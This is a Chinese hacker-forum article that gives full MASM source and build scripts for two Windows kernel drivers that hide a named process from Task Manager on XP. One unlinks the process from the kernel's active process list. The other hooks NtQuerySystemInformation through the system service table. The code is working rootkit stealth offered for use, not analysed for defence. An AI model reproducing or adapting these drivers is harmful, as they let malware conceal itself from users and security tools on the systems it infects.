进程隐藏的两种方法 - 中华隐士黑客联盟,全国最大的免费黑客技术培训基地! 免费一切,共享一切!

作者:dge

进程隐藏的两种方法
这两种都是很古老的方法，因为无聊，所以写了一下。代码在XP_SP2下调试通过.

(1).从活动进程链表（ActiveProcessLinks）中摘除自身,这种方法可以欺骗任务管理器，
下面这个程序做的就是双向链表的删除节点和插入节点，十分的简单。

;@echo off
;goto make

;----------------------------------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include d:\masm32\include\w2k\ntstatus.inc
include d:\masm32\include\w2k\ntddk.inc
include d:\masm32\include\w2k\ntoskrnl.inc
include d:\masm32\include\w2k\w2kundoc.inc
includelib d:\masm32\lib\w2k\ntoskrnl.lib
include d:\masm32\Macros\Strings.mac

_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP

;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------

.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4

.data
szHide db 'explorer.exe',0
Flink dd ?
Blink dd ?
Explorer dd ?
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------

.code

DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
local dwId,lpEprocess
local ListOffset,NameOffset
local IdOffset
local Version

; int 3
; invoke DbgPrint,$CTA0("\n\nEntry DriverEntry\n\n")
mov status,STATUS_DEVICE_CONFIGURATION_ERROR

invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
.if eax==STATUS_SUCCESS
mov eax,pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset _DriverUnload
assume eax:nothing
;获得得系统版本
invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version
cmp eax,0
jne l1
mov ListOffset,0A0h
mov NameOffset,1fch
jmp l2
l1: cmp eax,1
jne exit
mov ListOffset,88h
mov NameOffset,174h
l2: invoke PsGetCurrentProcessId
mov dwId,eax
invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
mov esi,lpEprocess
add esi,ListOffset
mov edi,esi
assume edi:PLIST_ENTRY
assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je l4
assume esi:nothing
sub esi,ListOffset
add esi,NameOffset
invoke strcmp,esi,addr szHide
.if eax == 0
sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi
assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov ebx,[esi].Blink
mov [ebx].Flink,eax
mov [eax].Blink,ebx
mov Flink,eax
mov Blink,ebx
assume eax:nothing
assume ebx:nothing

invoke DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n")
jmp l4
.endif
;恢复EPROCESS指针
sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink
jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status
ret
mov eax,STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp

;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------

_DriverUnload proc pDriverObject:PDRIVER_OBJECT

; int 3
; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n")
pushad

mov eax,Flink
mov ebx,Explorer
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov [ebx].Flink,eax

mov eax,Blink
mov [eax].Flink,ebx
mov [ebx].Blink,eax

popad
;清除符号连接
invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject

ret

_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------

end DriverEntry

:make

set path=%path%;d:\masm32\bin
set drv=hideprocess
ml /nologo /c /coff %drv%.bat
link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
del %drv%.obj
echo.
pause

;****************************************************************************************************

（2）.如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的，
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为，从而实现在任务管理器中隐藏进程的目的，下面就是实现代码。

;@echo off
;goto make

.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------

include d:\masm32\include\w2k\ntstatus.inc
include d:\masm32\include\w2k\ntddk.inc
include d:\masm32\include\w2k\native.inc
include d:\masm32\include\w2k\ntoskrnl.inc
includelib d:\masm32\lib\w2k\ntoskrnl.lib
include d:\masm32\Macros\Strings.mac
;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
;保存地址
dwOldNtQuerySystemInformation dd ?
dwAddr dd ?
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code

NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return

invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
pushad
test eax,eax
jnz exit
.if SysInfoClass == SystemProcessesAndThreadsInformation
mov esi,lpSysInfo
mov ebx,esi
add esi,[esi]

@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1

.if eax== 0
invoke DbgPrint, $CTA0("\nsuccessful \n")
.if dword ptr[esi-38h] == 0
mov dword ptr[ebx],0
jmp exit
.else
sub esi,38h
mov edx,[esi]
add [ebx],edx

add esi,[esi]
jmp @B
.endif
.else
sub esi,38h
cmp dword ptr[esi],0
jz exit
mov ebx,esi
add esi,[esi]
jmp @B
.endif
.endif

exit: popad

ret

NewNtQuerySystemInformation endp

;----------------------------------------------------------------------------------------------------
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
HookFunction proc

pushad
; int 3
; invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n")
;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址，这个数组中包含有NtXXXX函数的入口地址。
mov eax, [KeServiceDescriptorTable]
mov esi, [eax]
mov esi, [esi]
;下面五句为获取ZwQuerySystemInformation的地址
mov eax,ZwQuerySystemInformation
inc eax
inc eax
mov eax,[eax]
mov eax,[eax]
inc eax
movzx ecx,byte ptr[eax]
sal ecx,2
add esi,ecx
mov dwAddr,esi
mov edi,dword ptr[esi]
;保存旧的函数地址。
mov dwOldNtQuerySystemInformation,edi
mov edi,offset NewNtQuerySystemInformation
;修改入口地址
cli
mov dword ptr[esi],edi
sti
popad
mov eax, STATUS_SUCCESS

ret

HookFunction endp

;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
;必须保存环境，否则后果很严重。在这个函数中恢复被修改的地址。

pushad
; int 3
; invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n")
mov esi,dwAddr
mov eax,dwOldNtQuerySystemInformation
cli
mov dword ptr[esi],eax
sti
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax,pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad

ret

DriverUnload endp

;----------------------------------------------------------------------------------------------------
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT

; int 3
; invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n")
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS
.endif
mov eax, status

ret

DriverEntry endp

end DriverEntry

;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------

:make

set drv=hideprocess

d:\masm32\bin\ml /nologo /c /coff %drv%.bat
d:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj

del %drv%.obj

echo.
pause

参考：

(1) Windows2000 内核级进程隐藏、侦测技术
(2) A portable Win32 userland rootkit

黑客软件：	漏洞扫描 \| 木马间谍 \| 加密解密 \| 远程控制 \| 破坏攻击 \| 杀毒软件 \| 防火墙类 \| OICQ专区 \| 黑客必备 \| 常用工具 \| 网吧攻击
文章中心：	最新资讯 \| 黑客技术 \| 电脑基础 \| 菜鸟文摘 \| 网络安全 \| 网络技巧 \| QQ技巧 \| OQ空间代码 \| 免费资源 \| 编程世界 \| 建站技术
素材源码：	论坛相关 \| ASP源码 \| CGI 源码 \| NET 源码 \| PHP 源码 \| 酷站素材 \| 字体素材 \| 图片素材 \| 友情发布 \| 网页模版 \| 建站软件
教程动画：	黑客教程 \| 黑客编程 \| 网站入侵 \| 菜鸟教程 \| 入侵教程 \| 破解教程 \| 电子书籍 \| 网页制作 \| 高级会员 \| 综合教程 \| 本站原创